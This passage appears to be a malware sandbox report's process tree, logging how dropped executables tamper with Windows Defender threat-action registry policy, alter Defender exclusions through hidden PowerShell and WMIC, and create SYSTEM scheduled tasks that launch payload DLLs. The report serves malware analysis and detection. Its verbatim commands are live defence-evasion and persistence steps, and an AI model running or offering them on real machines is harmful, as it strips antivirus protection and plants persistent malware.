\"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5532
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1756
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5372
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2920
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 00:09:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\ZWmybuD.exe\" GH /vGFqdidko 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5480
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:1068

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\dzqjbCr.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\dzqjbCr.exe GH /QJoydidPL 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
PID:4156
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5596
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:1352
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5844
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:1068
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5220
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5800
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5880
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:4756
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5512
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6072
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:1840
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5424
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5288
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5940
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5804
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2536
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5912
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:5656
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:5224
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5532
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:2104
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:6088
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1388
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:4784
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\JIagaW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:4964
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\soHoNeH.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2676
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6072
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:6040
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:2144
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5596
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\aEDSYAr.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5764
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\KVpYlIV.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6068
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\jGUCkRd.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5836
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5804
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\ifJFebI.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3400
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3204
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 13:18:20 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\FlXAVTwf\slVqqLD.dll\",#1 /DdidUnf 385118" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:2364
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "rrqYunoktxOQmCoCX"
  2⤵
  PID:1804
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4236
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:2292
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3808

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\ZWmybuD.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\ZWmybuD.exe GH /vGFqdidko 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
PID:1028
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:4976
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5800
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5592
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:3204
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5416
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:6136
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5512
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:4072
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5296
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:4432
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4424
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5632
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2220
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:1840
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5280
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5304
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5432
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5256
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5676
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:5416
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3716
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:6072
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5512
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:5288
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:1300
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3848
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5220
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\iVWhCl.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:6136
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4628
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\lGMFQHr.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5372
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4240
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:6064
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2264
- C:\Windows\SysWOW64\schtasks.exe
